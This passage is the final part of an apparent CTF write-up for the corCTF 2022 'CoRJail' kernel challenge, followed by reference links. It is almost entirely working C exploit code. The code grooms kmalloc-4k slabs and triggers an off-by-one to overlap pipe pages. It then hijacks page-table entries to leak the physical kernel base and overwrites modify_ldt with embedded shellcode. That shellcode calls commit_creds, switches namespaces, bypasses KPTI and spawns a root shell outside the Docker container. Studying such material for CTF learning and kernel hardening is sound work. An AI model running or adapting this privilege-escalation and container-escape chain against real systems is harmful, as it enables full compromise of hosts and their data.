        ++running;
      } else if (i - last == 8) { // exactly one 8-object slab later
        last = i;
        last_idx_in_slab[running] = i;
        ++running;
      } else {
        last = 0; // pattern broken: restart the streak
        running = 0;
      }
      if (running == slab_cnt) {
        // fill the remainder of the current slab with pipes
        for (int j = 0; j < 8 && (i + j + 1 - last) % 8 != 0; ++j) {
          alloc_4k_pipe_at(i + j + 1);
          ++pipe_cnt;
        }
        finded = 1;
        break;
      }
    }
  }
  return finded ? 0 : -1;
}
size_t victim_pipe_fds[2];
/*
 * After the off-by-one, scan every pipe's 16-byte tag.  A tag that is still
 * well-formed ("UNIGURI@" + 0xdeadbeef....) but carries ANOTHER pipe's
 * index means two pipes now share a page: record reader index in
 * victim_pipe_fds[0] and the index embedded in the data in
 * victim_pipe_fds[1].  Returns 0 on success, -1 if no overlap (or a
 * destroyed tag) is found.
 */
int find_overlapped_pipes() {
  char buf[0x20];
  uint64_t *uint64_buf = (uint64_t *)buf;
  for (size_t i = 0; i < pipe_cnt; ++i) {
    read(pipe_fds[i][0], buf, 0x10);
    // tag structurally intact?
    int is_ok = (memcmp(buf, "UNIGURI@", 8) == 0 &&
                 (uint64_buf[1] >> 32) == 0xdeadbeef);
    // NOTE: despite the name, is_corrupted means "index matches its OWN pipe"
    int is_corrupted = (uint64_buf[1] == 0xdeadbeef00000000 + i);
    if (is_ok && !is_corrupted) {
      victim_pipe_fds[0] = i;
      victim_pipe_fds[1] = uint64_buf[1] & 0xffffffff;
      return 0;
    }
    if (!is_ok) {
      return -1; // tag destroyed entirely: bail out and let the caller retry
    }
  }
  return -1;
}
/*
 * Confirm the overlap is real: bytes written into pipe victim_pipe_fds[0]
 * must come back out of pipe victim_pipe_fds[1].  Both pipes are also
 * advanced past the test data.  Returns 0 on success, -1 otherwise.
 */
int test_overlapped_pipes() {
  char tmp[0x100];
  memset(tmp, 0, sizeof(tmp));
  const char *test_str = "UNIGURI!";
  const size_t test_str_len = strlen(test_str);
  printf(" [*] Test msg(len=0x%lx): \"%s\"\n", test_str_len, test_str);
  // advance the second pipe's write position first -- presumably to keep the
  // two pipes' ring offsets in sync (TODO confirm)
  write(pipe_fds[victim_pipe_fds[1]][1], tmp, test_str_len);
  strncpy(tmp, test_str, sizeof(tmp));
  printf(" [*] Write \"%s\" to pipe@%lx\n", tmp, victim_pipe_fds[0]);
  write(pipe_fds[victim_pipe_fds[0]][1], tmp, test_str_len);
  memset(tmp, 0, sizeof(tmp));
  read(pipe_fds[victim_pipe_fds[1]][0], tmp, test_str_len);
  printf(" [*] Read \"%s\" from pipe@%lx\n", tmp, victim_pipe_fds[1]);
  const int successed = !memcmp(test_str, tmp, test_str_len) ? 0 : -1;
  // drain the writer pipe too so later reads stay aligned
  read(pipe_fds[victim_pipe_fds[0]][0], tmp, test_str_len);
  return successed;
}
#define MMAP_SPRAY_COUNT 0x1000UL
#define FILE_SPRAY_COUNT (MMAP_SPRAY_COUNT / 0x10)
void *mmap_addrs[MMAP_SPRAY_COUNT];
#define MMAP_SPRAT_START_ADDR 0xcafe0000UL
#define MMAP_PAGE_SIZE 0x1000UL
#define MMAP_SPRAT_STEP 0x10000UL
#define MMAP_SPRAT_SIZE 0x10000UL
/*
 * Convert the pipe-page UAF into control of a PTE page:
 *  1. reserve many shared anonymous VMAs (no faults yet, so no PTE pages),
 *  2. close the victim pipe so its page returns to the page allocator,
 *  3. churn the filp cache with open("/")/close -- empirically required for
 *     the freed page to get recycled (see the write-up text above),
 *  4. fault in every sprayed page; each new PTE page is a 4k allocation and
 *     one should land in the freed pipe page.
 * Every page is stamped (mapping index << 32 | page pattern) so the one
 * whose PTE we later modify can be identified.
 */
void spray_ptes_target_to_victim_pipe_page() {
  for (int i = 0; i < MMAP_SPRAY_COUNT; ++i) {
    mmap_addrs[i] = mmap((void *)(MMAP_SPRAT_START_ADDR + i * MMAP_SPRAT_STEP),
                         MMAP_SPRAT_SIZE, PROT_READ | PROT_WRITE,
                         MAP_ANONYMOUS | MAP_SHARED, -1, 0);
    if (mmap_addrs[i] == MAP_FAILED) {
      fatal("mmap");
    }
  }
  int file_fds[FILE_SPRAY_COUNT];
  sched_yield();
  close_pipe_at(victim_pipe_fds[1]); // drop the last reference -> page freed
  for (int i = 0; i < FILE_SPRAY_COUNT; ++i) {
    file_fds[i] = open("/", O_RDONLY);
    if (file_fds[i] < 0) {
      fatal("open");
    }
  }
  for (int i = 0; i < FILE_SPRAY_COUNT; ++i) {
    close(file_fds[i]);
  }
  for (int i = 0; i < MMAP_SPRAY_COUNT; ++i) {
    for (int j = 0; j < MMAP_SPRAT_SIZE / MMAP_PAGE_SIZE; ++j) {
      uint64_t *addr = (uint64_t *)(mmap_addrs[i] + MMAP_PAGE_SIZE * j);
      const uint64_t val = ((uint64_t)i << 32) + j * 0x01010101;
      *addr = val;
    }
  }
}
void *corrupted_mmap_addr = (void *)-1;
/* Locate the sprayed page whose stamp no longer matches: its PTE is the one
 * we overwrote through the pipe.  The result is cached in
 * corrupted_mmap_addr ((void *)-1 means "not found yet"). */
void find_corrupted_mmap_addr() {
  if (corrupted_mmap_addr != (void *)-1) {
    return; // already located on a previous call
  }
  for (int spray = 0; spray < MMAP_SPRAY_COUNT; ++spray) {
    for (int page = 0; page < MMAP_SPRAT_SIZE / MMAP_PAGE_SIZE; ++page) {
      uint64_t *stamp = (uint64_t *)(mmap_addrs[spray] + MMAP_PAGE_SIZE * page);
      const uint64_t expected = ((uint64_t)spray << 32) + page * 0x01010101;
      if (*stamp != expected) {
        corrupted_mmap_addr = stamp;
        return;
      }
    }
  }
}
uint64_t original_ptes[0x1000 / 8];
uint64_t physical_kernel_base;
uint64_t default_pte_for_kernel_code;
/*
 * Overwrite the next PTE in the UAF PTE page by pushing 8 bytes through the
 * overlapping pipe, and return the userspace address now backed by the
 * physical page that `new_pte` points at.  Each call advances the pipe by 8
 * bytes (= one PTE), so successive calls map successive 0x1000 windows.
 */
void *set_pte(uint64_t new_pte) {
  static uint64_t cur_offset = 0; // virtual offset consumed so far
  if (cur_offset >= 0x1000 * 512) { // a PTE page holds 512 entries
    fatal("set_pte: too many modifications");
  }
  write(pipe_fds[victim_pipe_fds[0]][1], &new_pte, 8);
  if (corrupted_mmap_addr == (void *)-1) {
    find_corrupted_mmap_addr(); // first call: discover the affected mapping
  }
  void *affected_addr = corrupted_mmap_addr + cur_offset;
  cur_offset += 0x1000;
  return affected_addr;
}
uint64_t user_cs, user_ss, user_sp, user_rflags;
/*
 * Snapshot userspace cs/ss/rsp/rflags; the values are baked into the iretq
 * frame of the KPTI-bypass trampoline later.
 * NOTE(review): operand order is Intel syntax (destination first), so this
 * only assembles with -masm=intel -- confirm against the build flags.
 */
static void save_state() {
  asm("mov %[u_cs], cs;\n"
      "mov %[u_ss], ss;\n"
      "mov %[u_sp], rsp;\n"
      "pushf;\n"
      "pop %[u_rflags];\n"
      : [u_cs] "=r"(user_cs), [u_ss] "=r"(user_ss), [u_sp] "=r"(user_sp),
        [u_rflags] "=r"(user_rflags)::"memory");
  printf(
      "[*] user_cs: 0x%lx, user_ss: 0x%lx, user_sp: 0x%lx, user_rflags: "
      "0x%lx\n",
      user_cs, user_ss, user_sp, user_rflags);
}
#define MODIFY_LDT_ADDR 0xffffffff810252f0
#define MODIFY_LDT_OFFSET (MODIFY_LDT_ADDR - KERNEL_BASE_START)
uint64_t *modify_ldt_addr;
uint8_t original_modify_ldt_code[0x1000];
/*
 * Lands here in userspace after the patched modify_ldt() returns through
 * the KPTI trampoline (user_ip in the iretq frame points at this function).
 * The patch already ran commit_creds/switch_task_namespaces, so restore the
 * original syscall code (still writable via the remapped PTE) and exec bash.
 */
static void get_shell() {
  puts("[+] Escaping docker is success");
  puts(" [*] Restore original modify_ldt code");
  // only the bytes from modify_ldt's in-page offset to page end were saved
  memcpy(modify_ldt_addr, original_modify_ldt_code,
         sizeof(original_modify_ldt_code) - (MODIFY_LDT_OFFSET & 0xfff));
  puts("[+] Get shell!");
  char *argv[] = {"/bin/bash", NULL};
  char *envp[] = {NULL};
  execve("/bin/bash", argv, envp);
}
/*
 * Remap the physical page containing __x64_sys_modify_ldt into userspace
 * (writable, via one overwritten PTE), back up the original bytes, and
 * install the shellcode below with its runtime placeholders (pid, saved
 * user cs/ss/sp/rflags, return ip) patched in.
 */
void patch_modify_ldt() {
  // physical address of the page holding modify_ldt, as a present+RW PTE
  const uint64_t pte_for_modify_ldt =
      default_pte_for_kernel_code + (MODIFY_LDT_OFFSET & ~(0xFFF));
  modify_ldt_addr =
      (uint64_t *)(set_pte(pte_for_modify_ldt) + (MODIFY_LDT_OFFSET & 0xfff));
  /*
   * Below opcodes are from:
   * call get_rip;
   * get_rip:
   * pop r15;
   * sub r15, 0x252f0; // &__x64_sys_modify_ldt - kbase == 0x252f0
   * sub r15, 5; // call get_rip; takes 5 bytes
   *
   * // call commit_creds(&init_cred);
   * lea rdi, [r15 + 0x145a960]; // &init_cred - kbase == 0x145a960
   * lea rax, [r15 + 0xeba40]; // &commit_creds - kbase == 0xeba40
   * call rax;
   *
   * // task = find_task_by_vpid(1);
   * // call switch_task_namespaces(task, &init_nsproxy);
   * mov rdi, 1;
   * lea rax, [r15 + 0xe4fc0]; // &find_task_by_vpid - kbase == 0xe4fc0
   * call rax; // find_task_by_vpid(1)
   * mov rdi, rax; // task
   * lea rsi, [r15 + 0x145a720]; // &init_nsproxy - kbase == 0x145a720
   * lea rax, [r15 + 0xea4e0]; // &switch_task_namespaces - kbase == 0xea4e0
   * call rax; // switch_task_namespaces(task, &init_nsproxy);
   *
   * // current = find_task_by_vpid(pid);
   * // current->fs = copy_fs_struct(&init_fs);
   * lea rdi, [r15 + 0x1589740]; // &init_fs - kbase == 0x1589740
   * lea rax, [r15 + 0x2e7350]; // &copy_fs_struct - kbase == 0x2e7350
   * call rax; // copy_fs_struct(&init_fs);
   * mov rbx, rax; // new_fs
   * mov rdi, 0x1111111111111111; // pid: will be fixed
   * lea rax, [r15 + 0xe4fc0]; // &find_task_by_vpid - kbase == 0xe4fc0
   * call rax; // current = find_task_by_vpid(pid)
   * mov [rax + 0x6e0], rbx; // current->fs = new_fs
   *
   * // bypass kpti
   * xor rax, rax;
   * mov [rsp + 0x00], rax;
   * mov [rsp + 0x08], rax;
   * mov rax, 0x2222222222222222; // user_ip: will be fixed
   * mov [rsp + 0x10], rax;
   * mov rax, 0x3333333333333333; // user_cs: will be fixed
   * mov [rsp + 0x18], rax;
   * mov rax, 0x4444444444444444; // user_rflags: will be fixed
   * mov [rsp + 0x20], rax;
   * mov rax, 0x5555555555555555; // user_sp: will be fixed
   * mov [rsp + 0x28], rax;
   * mov rax, 0x6666666666666666; // user_ss: will be fixed
   * mov [rsp + 0x30], rax;
   * lea rax, [r15 + 0xc00f06]; // bypass_kpti - kbase == 0xc00f06
   * jmp rax; // bypass_kpti
   */
  uint8_t new_modify_ldt_code[] = {
      0xE8, 0x00, 0x00, 0x00, 0x00, 0x41, 0x5F, 0x49, 0x81, 0xEF, 0xF0, 0x52,
      0x02, 0x00, 0x49, 0x83, 0xEF, 0x05, 0x49, 0x8D, 0xBF, 0x60, 0xA9, 0x45,
      0x01, 0x49, 0x8D, 0x87, 0x40, 0xBA, 0x0E, 0x00, 0xFF, 0xD0, 0x48, 0xC7,
      0xC7, 0x01, 0x00, 0x00, 0x00, 0x49, 0x8D, 0x87, 0xC0, 0x4F, 0x0E, 0x00,
      0xFF, 0xD0, 0x48, 0x89, 0xC7, 0x49, 0x8D, 0xB7, 0x20, 0xA7, 0x45, 0x01,
      0x49, 0x8D, 0x87, 0xE0, 0xA4, 0x0E, 0x00, 0xFF, 0xD0, 0x49, 0x8D, 0xBF,
      0x40, 0x97, 0x58, 0x01, 0x49, 0x8D, 0x87, 0x50, 0x73, 0x2E, 0x00, 0xFF,
      0xD0, 0x48, 0x89, 0xC3, 0x48, 0xBF, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11,
      0x11, 0x11, 0x49, 0x8D, 0x87, 0xC0, 0x4F, 0x0E, 0x00, 0xFF, 0xD0, 0x48,
      0x89, 0x98, 0xE0, 0x06, 0x00, 0x00, 0x48, 0x31, 0xC0, 0x48, 0x89, 0x04,
      0x24, 0x48, 0x89, 0x44, 0x24, 0x08, 0x48, 0xB8, 0x22, 0x22, 0x22, 0x22,
      0x22, 0x22, 0x22, 0x22, 0x48, 0x89, 0x44, 0x24, 0x10, 0x48, 0xB8, 0x33,
      0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x48, 0x89, 0x44, 0x24, 0x18,
      0x48, 0xB8, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x48, 0x89,
      0x44, 0x24, 0x20, 0x48, 0xB8, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55,
      0x55, 0x48, 0x89, 0x44, 0x24, 0x28, 0x48, 0xB8, 0x66, 0x66, 0x66, 0x66,
      0x66, 0x66, 0x66, 0x66, 0x48, 0x89, 0x44, 0x24, 0x30, 0x49, 0x8D, 0x87,
      0x06, 0x0F, 0xC0, 0x00, 0xFF, 0xE0};
  // patch the 8-byte placeholders in the opcode blob with the live values
  uint64_t *ptr;
  ptr = (uint64_t *)memmem(new_modify_ldt_code, sizeof(new_modify_ldt_code),
                           "\x11\x11\x11\x11\x11\x11\x11\x11", 8);
  *ptr = getpid();
  ptr = (uint64_t *)memmem(new_modify_ldt_code, sizeof(new_modify_ldt_code),
                           "\x22\x22\x22\x22\x22\x22\x22\x22", 8);
  *ptr = (uint64_t)get_shell;
  ptr = (uint64_t *)memmem(new_modify_ldt_code, sizeof(new_modify_ldt_code),
                           "\x33\x33\x33\x33\x33\x33\x33\x33", 8);
  *ptr = user_cs;
  ptr = (uint64_t *)memmem(new_modify_ldt_code, sizeof(new_modify_ldt_code),
                           "\x44\x44\x44\x44\x44\x44\x44\x44", 8);
  *ptr = user_rflags;
  ptr = (uint64_t *)memmem(new_modify_ldt_code, sizeof(new_modify_ldt_code),
                           "\x55\x55\x55\x55\x55\x55\x55\x55", 8);
  *ptr = user_sp;
  ptr = (uint64_t *)memmem(new_modify_ldt_code, sizeof(new_modify_ldt_code),
                           "\x66\x66\x66\x66\x66\x66\x66\x66", 8);
  *ptr = user_ss;
  // back up the original bytes (from the in-page offset to page end) so
  // get_shell() can restore them, then install the shellcode
  memcpy(original_modify_ldt_code, modify_ldt_addr,
         sizeof(original_modify_ldt_code) - (MODIFY_LDT_OFFSET & 0xfff));
  memcpy(modify_ldt_addr, new_modify_ldt_code, sizeof(new_modify_ldt_code));
}
#define SLAB_COUNT 7
/*
 * Exploit driver: side-channel the kmalloc-4k slabs, trigger the off-by-one
 * to overlap two pipe pages, pivot the page UAF onto a PTE page, leak the
 * physical kernel base, patch modify_ldt, and call it to escape the jail.
 */
int main() {
  pin_to_core(0);
  save_state();
  vuln_fd = open("/proc_rw/cormon", O_RDWR);
  if (vuln_fd < 0) {
    fatal("open");
  }
  void *tmpbuf = malloc(0x1000);
  uint64_t *uint64_tmpbuf = (uint64_t *)tmpbuf; // NOTE(review): unused below
FIRST_STEP:
// close every pipe allocated so far and restart the whole attack
#define RETRY() \
  do { \
    for (int i = 0; i < pipe_cnt; ++i) { \
      close_pipe_at(i); \
    } \
    sched_yield(); \
    puts("\n[*] Retry from first step after 1 seconds\n"); \
    sleep(1); \
    goto FIRST_STEP; \
  } while (0)
  puts("[*] Do side-channel for kmalloc-4k slab...");
  while (make_kmalloc_4k_slab_full(SLAB_COUNT) < 0) {
    puts(" [*] Retry side-channel for kmalloc-4k slab...");
    for (int i = 0; i < pipe_cnt; ++i) {
      close_pipe_at(i);
    }
    sched_yield();
  }
  puts(" [+] Side-channel success");
  // pick a pipe buffer in the middle of the groomed slabs as the victim
  const size_t target_pipe_idx = SLAB_COUNT * 4 + 4;
  puts("[*] Trigger off-by-one...");
  sched_yield();
  // free the victim slot, let cormon's 4k buffer take it, overflow one byte
  // into the neighbor, then re-allocate a pipe buffer over the hole
  close_pipe_at(target_pipe_idx);
  off_by_one_in_kmalloc_4k();
  alloc_4k_pipe_at(target_pipe_idx);
  sched_yield();
  puts("[*] Finding overlapped pipes...");
  if (find_overlapped_pipes()) {
    puts(" [-] Overlapping seems false positive");
    RETRY();
  }
  printf(" [+] pipe @ %lx and pipe @ %lx are overlapped!\n",
         victim_pipe_fds[0], victim_pipe_fds[1]);
  puts("[*] Test overlapped pipes");
  if (test_overlapped_pipes() < 0) {
    puts(" [-] Overlapping seems false positive");
    RETRY();
  }
  puts(" [+] Overlapping is true");
  puts("[*] Set pipe's offset to 0x1000 for reading PTEs");
  write(pipe_fds[victim_pipe_fds[0]][1], original_ptes, 0x1000);
  puts("[*] Spray PTEs...");
  spray_ptes_target_to_victim_pipe_page();
  puts("[*] Read PTEs");
  read(pipe_fds[victim_pipe_fds[0]][0], original_ptes, 0x1000);
  // present|RW|user|accessed|dirty + NX and PAT bits: a typical data PTE
  if ((original_ptes[0] & PTE_FLAGS_MASK) != 0x8000000000000867) {
    puts(" [-] UAF page does not contain PTEs");
    RETRY();
  }
  printf(" [+] UAF page contains PTEs (One of them is 0x%016lx)\n",
         original_ptes[0]);
  puts("[*] Overwrite PTE to leak physical kernel base");
  const uint64_t new_pte_for_dmabuf =
      PAGE_DEFAULT_FLAGS | 0x9c000; // dmabuf..? WTF?!
  uint64_t *dmabuf_addr = (uint64_t *)set_pte(new_pte_for_dmabuf);
  find_corrupted_mmap_addr();
  if (corrupted_mmap_addr == (void *)-1) {
    puts(" [-] Corrupted mmap addr not found");
    RETRY();
  }
  printf(" [+] Corrupted mmap addr: %p\n", corrupted_mmap_addr);
  // see the write-up text: PA 0x9c000 holds a pointer whose page, minus
  // 0x2004000, is the physical kernel base (KASLR on)
  physical_kernel_base = (*dmabuf_addr & PTE_PFN_MASK) - 0x2004000ULL;
  printf(" [+] physical kernel base: 0x%016lx\n", physical_kernel_base);
  default_pte_for_kernel_code = physical_kernel_base | PAGE_DEFAULT_FLAGS;
  puts("[*] Escaping docker...");
  puts(" [*] Patch modify_ldt");
  patch_modify_ldt();
  puts(" [*] Call patched modify_ldt...");
  syscall(SYS_modify_ldt); // jumps into the shellcode, returns via get_shell
  puts(" [-] Failed to Escaping docker");
  get_enter_to_continue("Press enter to exit...");
  return 0;
}
Reference⌗
- https://github.com/Crusaders-of-Rust/corCTF-2022-public-challenge-archive/tree/master/pwn/corjail/task
- https://gitlab.com/sajjadium/ctf-archives/-/tree/main/ctfs/corCTF/2022/pwn/CoRJail
- https://github.com/isec-tugraz/SLUBStick
- https://github.com/Lotuhu/Page-UAF
- https://ptr-yudai.hatenablog.com/entry/2023/12/07/221333